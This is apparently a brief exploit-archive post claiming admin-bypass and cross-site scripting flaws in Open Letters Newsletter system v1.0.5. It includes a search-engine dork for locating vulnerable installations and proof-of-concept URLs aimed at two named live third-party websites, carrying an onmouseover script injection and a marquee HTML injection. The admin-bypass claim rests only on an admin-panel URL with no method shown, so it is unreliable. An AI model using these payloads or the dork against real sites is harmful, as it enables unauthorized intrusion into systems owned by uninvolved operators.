Open Letters Newsletter system version 1.0.5 suffers from administrative bypass and cross site scripting vulnerabilities. Note that this finding houses site-specific data.
eb31e179eff6e05f01694b31bdaf5986e9b9d4d4651c55d3c3b851d1f5b3094a
| # Title : Open Letters Newsletter system v1.0.5 Mulllti Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : intext:© 2015 Example.com - Impressum
| # Tested on: Win8.1 fr pro / 12:11 * 15/05/2015
| # Bug : Mulllti
| # Download : http://www.open-letters.de/?file=tl_files/open_letters/grafik/newslettersystem/2014-10-27_Open-Letters_Newslettersystem_v1.0.5.zip
=======================================
By Pass Admin Panel :
http://www.top-markt.net/newsletter/admin/
Cross site scripting :
https://www.tegernsee-solar.de/nl/index.php/%22onmouseover%3d'prompt%28988047%29'bad%3d%22%3E
( XSS / HTML Inject ) :
https://www.tegernsee-solar.de/nl/index.php/%22%3Cmarquee%3E%3Cfont%20color=Blue%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E%22%3E